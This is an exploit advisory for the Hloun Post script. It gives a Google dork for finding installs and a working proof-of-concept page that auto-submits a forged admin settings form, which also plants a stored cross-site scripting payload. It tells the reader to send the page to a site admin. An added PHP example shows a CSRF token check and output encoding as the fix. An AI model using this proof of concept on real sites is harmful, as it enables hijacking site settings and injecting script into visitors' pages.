
Hloun CSRF Change Site Setting

Author: alqnas eslam, Published: 28-06-2015
# Exploit Title: CSRF, cross-site scripting and change setting - script Hloun Post
# Google Dork: intext:"Powered by Hloun"
# Date: 28-6-2015
# Exploit Author: alqnas eslam
# Vendor Homepage: fb.com/alqnas4
# Software Link: https://github.com/hloun/HlounPost
# Version: all versions 1.0, 1.2, 1.3
# Tested on: Windows or Linux
Description:
The developer did not put a CSRF token in the settings form, so a forged request can be sent to update the settings.
The site description can also be edited this way, and it is not filtered against cross-site scripting.
poc:
<body onload="document.alqnas.submit()">
<form action="http://site.com/admincp/ajax.php?step=setting" name="alqnas" method="post">
<input type="hidden" name="title" value="alqnas eslam"/>
<input type="hidden" name="url" value="http://fb.com/alqnas4"/>
<input type="hidden" name="app_id" value="123456789"/>
<input type="hidden" name="app_key" value="7ekdmd82"/>
<input type="hidden" name="fb_link" value="http://fb.com/alqnas4"/>
<input type="hidden" name="tw_link" value="http://fb.com/alqnas4"/>
<input type="hidden" name="corn" value="1"/>
<input type="hidden" name="corn_time" value="2"/>
<input type="hidden" name="description" value="alqnas eslam"/>
<!-- here insert your code -->
<input type="hidden" name="ad" value="<script>alert(12345);</script>"/>
<input type="hidden" name="textb" value="alqnas eslam"/>

</form>
</body>
Save this code in an HTML file and send it to the site admin.
When the admin opens the page, the injected code is executed on the site.
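The two defects above are a missing anti-CSRF token on the settings form and settings that are written back into the page unencoded. The following is an added example (not Hloun Post's own code) of how the settings step could be hardened; it assumes a PHP session is already open for the logged-in admin, reuses the request path and field names from the PoC, and uses a hypothetical save_settings() that writes the values to a JSON file.

```php
<?php
// Added example, not code from HlounPost. Assumes session_start() has already
// run for an authenticated admin and that admincp/ajax.php?step=setting is the
// request shown in the PoC above.
declare(strict_types=1);

// One token per session. The settings form template must embed it as
// <input type="hidden" name="csrf_token" value="<?= e(csrf_token()) ?>">
// so that a page on another origin cannot know the value to forge.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept the POST only if it carries the token bound to this session.
// hash_equals() compares in constant time, so the check does not leak the token.
function csrf_check(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Encode a stored setting before it is printed into HTML, so a value such as
// the PoC's "<script>alert(12345);</script>" is shown as text, not executed.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hypothetical persistence: the real application stores settings elsewhere.
function save_settings(array $settings): void {
    file_put_contents(__DIR__ . '/settings.json', json_encode($settings));
}

if (($_GET['step'] ?? '') === 'setting') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_check($_POST)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    // Same field names as the PoC form; values are stored raw and encoded
    // with e() at output time, e.g. echo '<p>' . e($settings['ad']) . '</p>';
    $fields = ['title', 'url', 'app_id', 'app_key', 'fb_link', 'tw_link',
               'corn', 'corn_time', 'description', 'ad', 'textb'];
    $settings = [];
    foreach ($fields as $f) {
        $settings[$f] = (string)($_POST[$f] ?? '');
    }
    save_settings($settings);
}
```

With the token check in place the PoC form is rejected with 403 because the attacker's page cannot read the victim's session token, and encoding at output removes the stored XSS even if a value does get saved.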
